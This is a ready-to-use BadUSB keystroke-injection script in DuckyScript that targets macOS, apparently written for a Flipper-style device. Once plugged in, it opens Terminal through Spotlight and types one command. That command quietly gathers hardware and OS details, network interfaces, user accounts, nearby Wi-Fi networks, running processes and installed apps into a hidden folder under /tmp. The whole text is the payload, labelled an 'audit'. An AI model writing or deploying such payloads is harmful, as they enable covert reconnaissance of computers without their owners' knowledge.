REM ==============================================
REM CYBERFLIPPER — macOS Recon Script
REM macOS system information collector
REM Inspired by Hak5 OMG Cable payloads
REM ==============================================
REM TARGET: macOS 12+
REM AUTHOR: @CYBERFLIPPER / FLLC

DELAY 2000
GUI SPACE
DELAY 500
STRING terminal
DELAY 1000
ENTER
DELAY 1500
STRING mkdir -p /tmp/.cyber_audit && cd /tmp/.cyber_audit && echo "=== CYBERFLIPPER macOS AUDIT ===" > audit.txt && echo "Date: $(date)" >> audit.txt && echo "" >> audit.txt && echo "=== SYSTEM ===" >> audit.txt && sw_vers >> audit.txt && system_profiler SPHardwareDataType >> audit.txt && echo "" >> audit.txt && echo "=== NETWORK ===" >> audit.txt && ifconfig >> audit.txt && networksetup -listallhardwareports >> audit.txt && echo "" >> audit.txt && echo "=== USERS ===" >> audit.txt && dscl . list /Users | grep -v "^_" >> audit.txt && echo "" >> audit.txt && echo "=== WIFI ===" >> audit.txt && /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport -s >> audit.txt && echo "" >> audit.txt && echo "=== RUNNING PROCESSES ===" >> audit.txt && ps aux >> audit.txt && echo "" >> audit.txt && echo "=== INSTALLED APPS ===" >> audit.txt && ls /Applications >> audit.txt && echo "Audit complete: /tmp/.cyber_audit/audit.txt"
ENTER
DELAY 5000
